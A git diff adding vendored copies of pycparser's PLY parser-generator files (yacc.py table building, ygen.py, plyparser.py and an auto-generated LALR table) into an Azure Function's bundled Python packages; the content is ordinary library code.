pkg and isinstance(tabmodule, str): + if '.' not in tabmodule: + tabmodule = pkg + '.' 
+ tabmodule + + + + # Set start symbol if it's specified directly using an argument + if start is not None: + pdict['start'] = start + + # Collect parser information from the dictionary + pinfo = ParserReflect(pdict, log=errorlog) + pinfo.get_all() + + if pinfo.error: + raise YaccError('Unable to build parser') + + # Check signature against table files (if any) + signature = pinfo.signature() + + # Read the tables + try: + lr = LRTable() + if picklefile: + read_signature = lr.read_pickle(picklefile) + else: + read_signature = lr.read_table(tabmodule) + if optimize or (read_signature == signature): + try: + lr.bind_callables(pinfo.pdict) + parser = LRParser(lr, pinfo.error_func) + parse = parser.parse + return parser + except Exception as e: + errorlog.warning('There was a problem loading the table file: %r', e) + except VersionError as e: + errorlog.warning(str(e)) + except ImportError: + pass + + if debuglog is None: + if debug: + try: + debuglog = PlyLogger(open(os.path.join(outputdir, debugfile), 'w')) + except IOError as e: + errorlog.warning("Couldn't open %r. %s" % (debugfile, e)) + debuglog = NullLogger() + else: + debuglog = NullLogger() + + debuglog.info('Created by PLY version %s (http://www.dabeaz.com/ply)', __version__) + + errors = False + + # Validate the parser information + if pinfo.validate_all(): + raise YaccError('Unable to build parser') + + if not pinfo.error_func: + errorlog.warning('no p_error() function is defined') + + # Create a grammar object + grammar = Grammar(pinfo.tokens) + + # Set precedence level for terminals + for term, assoc, level in pinfo.preclist: + try: + grammar.set_precedence(term, assoc, level) + except GrammarError as e: + errorlog.warning('%s', e) + + # Add productions to the grammar + for funcname, gram in pinfo.grammar: + file, line, prodname, syms = gram + try: + grammar.add_production(prodname, syms, funcname, file, line) + except GrammarError as e: + errorlog.error('%s', e) + errors = True + + # Set the grammar start symbols + try: + if start is None: + grammar.set_start(pinfo.start) + else: + grammar.set_start(start) + except GrammarError as e: + errorlog.error(str(e)) + errors = True + + if errors: + raise YaccError('Unable to build parser') + + # Verify the grammar structure + undefined_symbols = grammar.undefined_symbols() + for sym, prod in undefined_symbols: + errorlog.error('%s:%d: Symbol %r used, but not defined as a token or a rule', prod.file, prod.line, sym) + errors = True + + unused_terminals = grammar.unused_terminals() + if unused_terminals: + debuglog.info('') + debuglog.info('Unused terminals:') + debuglog.info('') + for term in unused_terminals: + errorlog.warning('Token %r defined, but not used', term) + debuglog.info(' %s', term) + + # Print out all productions to the debug log + if debug: + debuglog.info('') + debuglog.info('Grammar') + debuglog.info('') + for n, p in enumerate(grammar.Productions): + debuglog.info('Rule %-5d %s', n, p) + + # Find unused non-terminals + unused_rules = grammar.unused_rules() + for prod in unused_rules: + errorlog.warning('%s:%d: Rule %r defined, but not used', prod.file, prod.line, prod.name) + + if len(unused_terminals) == 1: + errorlog.warning('There is 1 unused token') + if len(unused_terminals) > 1: + errorlog.warning('There are %d unused tokens', len(unused_terminals)) + + if len(unused_rules) == 1: + errorlog.warning('There is 1 unused rule') + if len(unused_rules) > 1: + errorlog.warning('There are %d unused rules', len(unused_rules)) + + if debug: + debuglog.info('') + 
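# What follows is the parser.out-style cross reference: for every
+        # terminal and nonterminal, the grammar-rule numbers in which it
+        # appears. This is the first thing to consult when tracing the
+        # unused-symbol warnings above back to specific rules.
+ 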
debuglog.info('Terminals, with rules where they appear') + debuglog.info('') + terms = list(grammar.Terminals) + terms.sort() + for term in terms: + debuglog.info('%-20s : %s', term, ' '.join([str(s) for s in grammar.Terminals[term]])) + + debuglog.info('') + debuglog.info('Nonterminals, with rules where they appear') + debuglog.info('') + nonterms = list(grammar.Nonterminals) + nonterms.sort() + for nonterm in nonterms: + debuglog.info('%-20s : %s', nonterm, ' '.join([str(s) for s in grammar.Nonterminals[nonterm]])) + debuglog.info('') + + if check_recursion: + unreachable = grammar.find_unreachable() + for u in unreachable: + errorlog.warning('Symbol %r is unreachable', u) + + infinite = grammar.infinite_cycles() + for inf in infinite: + errorlog.error('Infinite recursion detected for symbol %r', inf) + errors = True + + unused_prec = grammar.unused_precedence() + for term, assoc in unused_prec: + errorlog.error('Precedence rule %r defined for unknown symbol %r', assoc, term) + errors = True + + if errors: + raise YaccError('Unable to build parser') + + # Run the LRGeneratedTable on the grammar + if debug: + errorlog.debug('Generating %s tables', method) + + lr = LRGeneratedTable(grammar, method, debuglog) + + if debug: + num_sr = len(lr.sr_conflicts) + + # Report shift/reduce and reduce/reduce conflicts + if num_sr == 1: + errorlog.warning('1 shift/reduce conflict') + elif num_sr > 1: + errorlog.warning('%d shift/reduce conflicts', num_sr) + + num_rr = len(lr.rr_conflicts) + if num_rr == 1: + errorlog.warning('1 reduce/reduce conflict') + elif num_rr > 1: + errorlog.warning('%d reduce/reduce conflicts', num_rr) + + # Write out conflicts to the output file + if debug and (lr.sr_conflicts or lr.rr_conflicts): + debuglog.warning('') + debuglog.warning('Conflicts:') + debuglog.warning('') + + for state, tok, resolution in lr.sr_conflicts: + debuglog.warning('shift/reduce conflict for %s in state %d resolved as %s', tok, state, resolution) + + already_reported = set() + for state, rule, rejected in lr.rr_conflicts: + if (state, id(rule), id(rejected)) in already_reported: + continue + debuglog.warning('reduce/reduce conflict in state %d resolved using rule (%s)', state, rule) + debuglog.warning('rejected rule (%s) in state %d', rejected, state) + errorlog.warning('reduce/reduce conflict in state %d resolved using rule (%s)', state, rule) + errorlog.warning('rejected rule (%s) in state %d', rejected, state) + already_reported.add((state, id(rule), id(rejected))) + + warned_never = [] + for state, rule, rejected in lr.rr_conflicts: + if not rejected.reduced and (rejected not in warned_never): + debuglog.warning('Rule (%s) is never reduced', rejected) + errorlog.warning('Rule (%s) is never reduced', rejected) + warned_never.append(rejected) + + # Write the table file if requested + if write_tables: + try: + lr.write_table(tabmodule, outputdir, signature) + except IOError as e: + errorlog.warning("Couldn't create %r. %s" % (tabmodule, e)) + + # Write a pickled version of the tables + if picklefile: + try: + lr.pickle_table(picklefile, signature) + except IOError as e: + errorlog.warning("Couldn't create %r. 
%s" % (picklefile, e)) + + # Build the parser + lr.bind_callables(pinfo.pdict) + parser = LRParser(lr, pinfo.error_func) + + parse = parser.parse + return parser diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ygen.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ygen.py new file mode 100644 index 0000000..46c4c84 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ygen.py @@ -0,0 +1,74 @@ +# ply: ygen.py +# +# This is a support program that auto-generates different versions of the YACC parsing +# function with different features removed for the purposes of performance. +# +# Users should edit the method LParser.parsedebug() in yacc.py. The source code +# for that method is then used to create the other methods. See the comments in +# yacc.py for further details. + +import os.path +import shutil + +def get_source_range(lines, tag): + srclines = enumerate(lines) + start_tag = '#--! %s-start' % tag + end_tag = '#--! %s-end' % tag + + for start_index, line in srclines: + if line.strip().startswith(start_tag): + break + + for end_index, line in srclines: + if line.strip().endswith(end_tag): + break + + return (start_index + 1, end_index) + +def filter_section(lines, tag): + filtered_lines = [] + include = True + tag_text = '#--! %s' % tag + for line in lines: + if line.strip().startswith(tag_text): + include = not include + elif include: + filtered_lines.append(line) + return filtered_lines + +def main(): + dirname = os.path.dirname(__file__) + shutil.copy2(os.path.join(dirname, 'yacc.py'), os.path.join(dirname, 'yacc.py.bak')) + with open(os.path.join(dirname, 'yacc.py'), 'r') as f: + lines = f.readlines() + + parse_start, parse_end = get_source_range(lines, 'parsedebug') + parseopt_start, parseopt_end = get_source_range(lines, 'parseopt') + parseopt_notrack_start, parseopt_notrack_end = get_source_range(lines, 'parseopt-notrack') + + # Get the original source + orig_lines = lines[parse_start:parse_end] + + # Filter the DEBUG sections out + parseopt_lines = filter_section(orig_lines, 'DEBUG') + + # Filter the TRACKING sections out + parseopt_notrack_lines = filter_section(parseopt_lines, 'TRACKING') + + # Replace the parser source sections with updated versions + lines[parseopt_notrack_start:parseopt_notrack_end] = parseopt_notrack_lines + lines[parseopt_start:parseopt_end] = parseopt_lines + + lines = [line.rstrip()+'\n' for line in lines] + with open(os.path.join(dirname, 'yacc.py'), 'w') as f: + f.writelines(lines) + + print('Updated yacc.py') + +if __name__ == '__main__': + main() + + + + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/plyparser.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/plyparser.py new file mode 100644 index 0000000..9156c17 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/plyparser.py @@ -0,0 +1,133 @@ +#----------------------------------------------------------------- +# plyparser.py +# +# PLYParser class and other utilities for simplifying programming +# parsers with PLY +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- + +import warnings + +class Coord(object): + """ Coordinates of a syntactic element. 
Consists of: + - File name + - Line number + - (optional) column number, for the Lexer + """ + __slots__ = ('file', 'line', 'column', '__weakref__') + def __init__(self, file, line, column=None): + self.file = file + self.line = line + self.column = column + + def __str__(self): + str = "%s:%s" % (self.file, self.line) + if self.column: str += ":%s" % self.column + return str + + +class ParseError(Exception): pass + + +class PLYParser(object): + def _create_opt_rule(self, rulename): + """ Given a rule name, creates an optional ply.yacc rule + for it. The name of the optional rule is + _opt + """ + optname = rulename + '_opt' + + def optrule(self, p): + p[0] = p[1] + + optrule.__doc__ = '%s : empty\n| %s' % (optname, rulename) + optrule.__name__ = 'p_%s' % optname + setattr(self.__class__, optrule.__name__, optrule) + + def _coord(self, lineno, column=None): + return Coord( + file=self.clex.filename, + line=lineno, + column=column) + + def _token_coord(self, p, token_idx): + """ Returns the coordinates for the YaccProduction object 'p' indexed + with 'token_idx'. The coordinate includes the 'lineno' and + 'column'. Both follow the lex semantic, starting from 1. + """ + last_cr = p.lexer.lexer.lexdata.rfind('\n', 0, p.lexpos(token_idx)) + if last_cr < 0: + last_cr = -1 + column = (p.lexpos(token_idx) - (last_cr)) + return self._coord(p.lineno(token_idx), column) + + def _parse_error(self, msg, coord): + raise ParseError("%s: %s" % (coord, msg)) + + +def parameterized(*params): + """ Decorator to create parameterized rules. + + Parameterized rule methods must be named starting with 'p_' and contain + 'xxx', and their docstrings may contain 'xxx' and 'yyy'. These will be + replaced by the given parameter tuples. For example, ``p_xxx_rule()`` with + docstring 'xxx_rule : yyy' when decorated with + ``@parameterized(('id', 'ID'))`` produces ``p_id_rule()`` with the docstring + 'id_rule : ID'. Using multiple tuples produces multiple rules. + """ + def decorate(rule_func): + rule_func._params = params + return rule_func + return decorate + + +def template(cls): + """ Class decorator to generate rules from parameterized rule templates. + + See `parameterized` for more information on parameterized rules. + """ + issued_nodoc_warning = False + for attr_name in dir(cls): + if attr_name.startswith('p_'): + method = getattr(cls, attr_name) + if hasattr(method, '_params'): + # Remove the template method + delattr(cls, attr_name) + # Create parameterized rules from this method; only run this if + # the method has a docstring. This is to address an issue when + # pycparser's users are installed in -OO mode which strips + # docstrings away. + # See: https://github.com/eliben/pycparser/pull/198/ and + # https://github.com/eliben/pycparser/issues/197 + # for discussion. + if method.__doc__ is not None: + _create_param_rules(cls, method) + elif not issued_nodoc_warning: + warnings.warn( + 'parsing methods must have __doc__ for pycparser to work properly', + RuntimeWarning, + stacklevel=2) + issued_nodoc_warning = True + return cls + + +def _create_param_rules(cls, func): + """ Create ply.yacc rules based on a parameterized rule function + + Generates new methods (one per each pair of parameters) based on the + template rule function `func`, and attaches them to `cls`. The rule + function's parameters must be accessible via its `_params` attribute. 
+ """ + for xxx, yyy in func._params: + # Use the template method's body for each new method + def param_rule(self, p): + func(self, p) + + # Substitute in the params for the grammar rule and function name + param_rule.__doc__ = func.__doc__.replace('xxx', xxx).replace('yyy', yyy) + param_rule.__name__ = func.__name__.replace('xxx', xxx) + + # Attach the new method to the class + setattr(cls, param_rule.__name__, param_rule) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/yacctab.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/yacctab.py new file mode 100644 index 0000000..31ad7fc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/yacctab.py @@ -0,0 +1,366 @@ + +# yacctab.py +# This file is automatically generated. Do not edit. +_tabversion = '3.10' + +_lr_method = 'LALR' + +_lr_signature = 'translation_unit_or_emptyleftLORleftLANDleftORleftXORleftANDleftEQNEleftGTGELTLEleftRSHIFTLSHIFTleftPLUSMINUSleftTIMESDIVIDEMODAUTO BREAK CASE CHAR CONST CONTINUE DEFAULT DO DOUBLE ELSE ENUM EXTERN FLOAT FOR GOTO IF INLINE INT LONG REGISTER OFFSETOF RESTRICT RETURN SHORT SIGNED SIZEOF STATIC STRUCT SWITCH TYPEDEF UNION UNSIGNED VOID VOLATILE WHILE __INT128 _BOOL _COMPLEX _NORETURN _THREAD_LOCAL _STATIC_ASSERT _ATOMIC _ALIGNOF _ALIGNAS ID TYPEID INT_CONST_DEC INT_CONST_OCT INT_CONST_HEX INT_CONST_BIN INT_CONST_CHAR FLOAT_CONST HEX_FLOAT_CONST CHAR_CONST WCHAR_CONST U8CHAR_CONST U16CHAR_CONST U32CHAR_CONST STRING_LITERAL WSTRING_LITERAL U8STRING_LITERAL U16STRING_LITERAL U32STRING_LITERAL PLUS MINUS TIMES DIVIDE MOD OR AND NOT XOR LSHIFT RSHIFT LOR LAND LNOT LT LE GT GE EQ NE EQUALS TIMESEQUAL DIVEQUAL MODEQUAL PLUSEQUAL MINUSEQUAL LSHIFTEQUAL RSHIFTEQUAL ANDEQUAL XOREQUAL OREQUAL PLUSPLUS MINUSMINUS ARROW CONDOP LPAREN RPAREN LBRACKET RBRACKET LBRACE RBRACE COMMA PERIOD SEMI COLON ELLIPSIS PPHASH PPPRAGMA PPPRAGMASTRabstract_declarator_opt : empty\n| abstract_declaratorassignment_expression_opt : empty\n| assignment_expressionblock_item_list_opt : empty\n| block_item_listdeclaration_list_opt : empty\n| declaration_listdeclaration_specifiers_no_type_opt : empty\n| declaration_specifiers_no_typedesignation_opt : empty\n| designationexpression_opt : empty\n| expressionid_init_declarator_list_opt : empty\n| id_init_declarator_listidentifier_list_opt : empty\n| identifier_listinit_declarator_list_opt : empty\n| init_declarator_listinitializer_list_opt : empty\n| initializer_listparameter_type_list_opt : empty\n| parameter_type_liststruct_declarator_list_opt : empty\n| struct_declarator_listtype_qualifier_list_opt : empty\n| type_qualifier_list direct_id_declarator : ID\n direct_id_declarator : LPAREN id_declarator RPAREN\n direct_id_declarator : direct_id_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_id_declarator : direct_id_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_id_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET\n direct_id_declarator : direct_id_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_id_declarator : direct_id_declarator LPAREN parameter_type_list RPAREN\n | direct_id_declarator LPAREN identifier_list_opt RPAREN\n direct_typeid_declarator : TYPEID\n direct_typeid_declarator : LPAREN typeid_declarator RPAREN\n direct_typeid_declarator : direct_typeid_declarator LBRACKET 
type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_typeid_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LPAREN parameter_type_list RPAREN\n | direct_typeid_declarator LPAREN identifier_list_opt RPAREN\n direct_typeid_noparen_declarator : TYPEID\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_typeid_noparen_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LPAREN parameter_type_list RPAREN\n | direct_typeid_noparen_declarator LPAREN identifier_list_opt RPAREN\n id_declarator : direct_id_declarator\n id_declarator : pointer direct_id_declarator\n typeid_declarator : direct_typeid_declarator\n typeid_declarator : pointer direct_typeid_declarator\n typeid_noparen_declarator : direct_typeid_noparen_declarator\n typeid_noparen_declarator : pointer direct_typeid_noparen_declarator\n translation_unit_or_empty : translation_unit\n | empty\n translation_unit : external_declaration\n translation_unit : translation_unit external_declaration\n external_declaration : function_definition\n external_declaration : declaration\n external_declaration : pp_directive\n | pppragma_directive\n external_declaration : SEMI\n external_declaration : static_assert\n static_assert : _STATIC_ASSERT LPAREN constant_expression COMMA unified_string_literal RPAREN\n | _STATIC_ASSERT LPAREN constant_expression RPAREN\n pp_directive : PPHASH\n pppragma_directive : PPPRAGMA\n | PPPRAGMA PPPRAGMASTR\n function_definition : id_declarator declaration_list_opt compound_statement\n function_definition : declaration_specifiers id_declarator declaration_list_opt compound_statement\n statement : labeled_statement\n | expression_statement\n | compound_statement\n | selection_statement\n | iteration_statement\n | jump_statement\n | pppragma_directive\n | static_assert\n pragmacomp_or_statement : pppragma_directive statement\n | statement\n decl_body : declaration_specifiers init_declarator_list_opt\n | declaration_specifiers_no_type id_init_declarator_list_opt\n declaration : decl_body SEMI\n declaration_list : declaration\n | declaration_list declaration\n declaration_specifiers_no_type : type_qualifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : storage_class_specifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : function_specifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : atomic_specifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : alignment_specifier declaration_specifiers_no_type_opt\n declaration_specifiers : declaration_specifiers type_qualifier\n declaration_specifiers : declaration_specifiers storage_class_specifier\n declaration_specifiers : declaration_specifiers function_specifier\n declaration_specifiers : declaration_specifiers 
type_specifier_no_typeid\n declaration_specifiers : type_specifier\n declaration_specifiers : declaration_specifiers_no_type type_specifier\n declaration_specifiers : declaration_specifiers alignment_specifier\n storage_class_specifier : AUTO\n | REGISTER\n | STATIC\n | EXTERN\n | TYPEDEF\n | _THREAD_LOCAL\n function_specifier : INLINE\n | _NORETURN\n type_specifier_no_typeid : VOID\n | _BOOL\n | CHAR\n | SHORT\n | INT\n | LONG\n | FLOAT\n | DOUBLE\n | _COMPLEX\n | SIGNED\n | UNSIGNED\n | __INT128\n type_specifier : typedef_name\n | enum_specifier\n | struct_or_union_specifier\n | type_specifier_no_typeid\n | atomic_specifier\n atomic_specifier : _ATOMIC LPAREN type_name RPAREN\n type_qualifier : CONST\n | RESTRICT\n | VOLATILE\n | _ATOMIC\n init_declarator_list : init_declarator\n | init_declarator_list COMMA init_declarator\n init_declarator : declarator\n | declarator EQUALS initializer\n id_init_declarator_list : id_init_declarator\n | id_init_declarator_list COMMA init_declarator\n id_init_declarator : id_declarator\n | id_declarator EQUALS initializer\n specifier_qualifier_list : specifier_qualifier_list type_specifier_no_typeid\n specifier_qualifier_list : specifier_qualifier_list type_qualifier\n specifier_qualifier_list : type_specifier\n specifier_qualifier_list : type_qualifier_list type_specifier\n specifier_qualifier_list : alignment_specifier\n specifier_qualifier_list : specifier_qualifier_list alignment_specifier\n struct_or_union_specifier : struct_or_union ID\n | struct_or_union TYPEID\n struct_or_union_specifier : struct_or_union brace_open struct_declaration_list brace_close\n | struct_or_union brace_open brace_close\n struct_or_union_specifier : struct_or_union ID brace_open struct_declaration_list brace_close\n | struct_or_union ID brace_open brace_close\n | struct_or_union TYPEID brace_open struct_declaration_list brace_close\n | struct_or_union TYPEID brace_open brace_close\n struct_or_union : STRUCT\n | UNION\n struct_declaration_list : struct_declaration\n | struct_declaration_list struct_declaration\n struct_declaration : specifier_qualifier_list struct_declarator_list_opt SEMI\n struct_declaration : SEMI\n struct_declaration : pppragma_directive\n struct_declarator_list : struct_declarator\n | struct_declarator_list COMMA struct_declarator\n struct_declarator : declarator\n struct_declarator : declarator COLON constant_expression\n | COLON constant_expression\n enum_specifier : ENUM ID\n | ENUM TYPEID\n enum_specifier : ENUM brace_open enumerator_list brace_close\n enum_specifier : ENUM ID brace_open enumerator_list brace_close\n | ENUM TYPEID brace_open enumerator_list brace_close\n enumerator_list : enumerator\n | enumerator_list COMMA\n | enumerator_list COMMA enumerator\n alignment_specifier : _ALIGNAS LPAREN type_name RPAREN\n | _ALIGNAS LPAREN constant_expression RPAREN\n enumerator : ID\n | ID EQUALS constant_expression\n declarator : id_declarator\n | typeid_declarator\n pointer : TIMES type_qualifier_list_opt\n | TIMES type_qualifier_list_opt pointer\n type_qualifier_list : type_qualifier\n | type_qualifier_list type_qualifier\n parameter_type_list : parameter_list\n | parameter_list COMMA ELLIPSIS\n parameter_list : parameter_declaration\n | parameter_list COMMA parameter_declaration\n parameter_declaration : declaration_specifiers id_declarator\n | declaration_specifiers typeid_noparen_declarator\n parameter_declaration : declaration_specifiers abstract_declarator_opt\n identifier_list : identifier\n | identifier_list COMMA identifier\n initializer : 
assignment_expression\n initializer : brace_open initializer_list_opt brace_close\n | brace_open initializer_list COMMA brace_close\n initializer_list : designation_opt initializer\n | initializer_list COMMA designation_opt initializer\n designation : designator_list EQUALS\n designator_list : designator\n | designator_list designator\n designator : LBRACKET constant_expression RBRACKET\n | PERIOD identifier\n type_name : specifier_qualifier_list abstract_declarator_opt\n abstract_declarator : pointer\n abstract_declarator : pointer direct_abstract_declarator\n abstract_declarator : direct_abstract_declarator\n direct_abstract_declarator : LPAREN abstract_declarator RPAREN direct_abstract_declarator : direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET\n direct_abstract_declarator : LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_abstract_declarator : direct_abstract_declarator LBRACKET TIMES RBRACKET\n direct_abstract_declarator : LBRACKET TIMES RBRACKET\n direct_abstract_declarator : direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN\n direct_abstract_declarator : LPAREN parameter_type_list_opt RPAREN\n block_item : declaration\n | statement\n block_item_list : block_item\n | block_item_list block_item\n compound_statement : brace_open block_item_list_opt brace_close labeled_statement : ID COLON pragmacomp_or_statement labeled_statement : CASE constant_expression COLON pragmacomp_or_statement labeled_statement : DEFAULT COLON pragmacomp_or_statement selection_statement : IF LPAREN expression RPAREN pragmacomp_or_statement selection_statement : IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement selection_statement : SWITCH LPAREN expression RPAREN pragmacomp_or_statement iteration_statement : WHILE LPAREN expression RPAREN pragmacomp_or_statement iteration_statement : DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI iteration_statement : FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement iteration_statement : FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement jump_statement : GOTO ID SEMI jump_statement : BREAK SEMI jump_statement : CONTINUE SEMI jump_statement : RETURN expression SEMI\n | RETURN SEMI\n expression_statement : expression_opt SEMI expression : assignment_expression\n | expression COMMA assignment_expression\n assignment_expression : LPAREN compound_statement RPAREN typedef_name : TYPEID assignment_expression : conditional_expression\n | unary_expression assignment_operator assignment_expression\n assignment_operator : EQUALS\n | XOREQUAL\n | TIMESEQUAL\n | DIVEQUAL\n | MODEQUAL\n | PLUSEQUAL\n | MINUSEQUAL\n | LSHIFTEQUAL\n | RSHIFTEQUAL\n | ANDEQUAL\n | OREQUAL\n constant_expression : conditional_expression conditional_expression : binary_expression\n | binary_expression CONDOP expression COLON conditional_expression\n binary_expression : cast_expression\n | binary_expression TIMES binary_expression\n | binary_expression DIVIDE binary_expression\n | binary_expression MOD binary_expression\n | binary_expression PLUS binary_expression\n | binary_expression MINUS binary_expression\n | binary_expression RSHIFT binary_expression\n | binary_expression LSHIFT binary_expression\n | binary_expression LT binary_expression\n | binary_expression LE binary_expression\n | binary_expression GE binary_expression\n | binary_expression GT binary_expression\n | binary_expression EQ binary_expression\n | 
binary_expression NE binary_expression\n | binary_expression AND binary_expression\n | binary_expression OR binary_expression\n | binary_expression XOR binary_expression\n | binary_expression LAND binary_expression\n | binary_expression LOR binary_expression\n cast_expression : unary_expression cast_expression : LPAREN type_name RPAREN cast_expression unary_expression : postfix_expression unary_expression : PLUSPLUS unary_expression\n | MINUSMINUS unary_expression\n | unary_operator cast_expression\n unary_expression : SIZEOF unary_expression\n | SIZEOF LPAREN type_name RPAREN\n | _ALIGNOF LPAREN type_name RPAREN\n unary_operator : AND\n | TIMES\n | PLUS\n | MINUS\n | NOT\n | LNOT\n postfix_expression : primary_expression postfix_expression : postfix_expression LBRACKET expression RBRACKET postfix_expression : postfix_expression LPAREN argument_expression_list RPAREN\n | postfix_expression LPAREN RPAREN\n postfix_expression : postfix_expression PERIOD ID\n | postfix_expression PERIOD TYPEID\n | postfix_expression ARROW ID\n | postfix_expression ARROW TYPEID\n postfix_expression : postfix_expression PLUSPLUS\n | postfix_expression MINUSMINUS\n postfix_expression : LPAREN type_name RPAREN brace_open initializer_list brace_close\n | LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close\n primary_expression : identifier primary_expression : constant primary_expression : unified_string_literal\n | unified_wstring_literal\n primary_expression : LPAREN expression RPAREN primary_expression : OFFSETOF LPAREN type_name COMMA offsetof_member_designator RPAREN\n offsetof_member_designator : identifier\n | offsetof_member_designator PERIOD identifier\n | offsetof_member_designator LBRACKET expression RBRACKET\n argument_expression_list : assignment_expression\n | argument_expression_list COMMA assignment_expression\n identifier : ID constant : INT_CONST_DEC\n | INT_CONST_OCT\n | INT_CONST_HEX\n | INT_CONST_BIN\n | INT_CONST_CHAR\n constant : FLOAT_CONST\n | HEX_FLOAT_CONST\n constant : CHAR_CONST\n | WCHAR_CONST\n | U8CHAR_CONST\n | U16CHAR_CONST\n | U32CHAR_CONST\n unified_string_literal : STRING_LITERAL\n | unified_string_literal STRING_LITERAL\n unified_wstring_literal : WSTRING_LITERAL\n | U8STRING_LITERAL\n | U16STRING_LITERAL\n | U32STRING_LITERAL\n | unified_wstring_literal WSTRING_LITERAL\n | unified_wstring_literal U8STRING_LITERAL\n | unified_wstring_literal U16STRING_LITERAL\n | unified_wstring_literal U32STRING_LITERAL\n brace_open : LBRACE\n brace_close : RBRACE\n empty : ' + +_lr_action_items = 
{'INT_CONST_CHAR':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,132,-335,-28,-182,-27,132,-337,-87,-72,-337,132,-286,-285,132,132,-283,-287,-288,132,-284,132,132,132,-336,-183,132,132,-28,-337,132,-28,-337,-337,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,-337,-76,-79,-82,-75,132,-77,132,132,-81,-215,-214,-80,-216,132,-78,132,132,-69,-284,132,132,-284,132,132,-244,-247,-245,-241,-242,-246,-248,132,-250,-251,-243,-249,-12,132,132,-11,132,132,132,132,-234,-233,132,-231,132,132,-217,132,-230,132,-84,-218,132,132,132,-337,-337,-198,132,132,132,-337,-284,-229,-232,132,-221,132,-83,-219,-68,132,-28,-337,132,-11,132,132,-220,132,132,132,-284,132,132,132,-337,132,-225,-224,-222,-84,132,132,132,-226,-223,132,-228,-227,]),'VOID':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[6,-337,-113,-128,6,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,6,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,6,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,6,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,6,-131,-95,-101,-97,6,-53,-126,6,-88,6,6,-93,6,-147,-335,-146,6,-167,-166,-182,-100,-126,6,-87,-90,-94,-92,-61,-72,6,-144,-142,6,6,6,-73,6,-89,6,6,6,-149,-159,-160,-156,-336,6,-183,-30,6,6,-74,6,6,6,6,-174,-175,6,-143,-140,6,-141,-145,-76,-79,-82,-75,-77,6,-81,-215,-214,-80,-216,-78,-127,6,-153,6,-151,-148,-157,-168,-69,-36,-35,6,6,6,-234,-233,6,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,6,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,